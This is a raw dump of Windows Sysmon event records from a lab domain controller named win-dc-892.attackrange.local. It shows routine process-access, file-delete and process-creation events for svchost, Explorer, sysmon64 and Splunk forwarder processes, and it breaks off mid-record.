12:06:03.923{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.923{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000009858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000009857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.907{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.907{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.454{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.454{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000009850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.439{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6592EE3DB6471E4F4F8E787005BBEBDE,SHA256=F8CB8A4EDDC8AD7C3319A64AEBCBD3746C19167B0088EA500443EF746EDA0712,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AA-6064-4E01-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-65AA-6064-4E01-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AA-6064-4E01-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:02.987{266CAFBE-65AA-6064-4E01-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AC-6064-5201-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd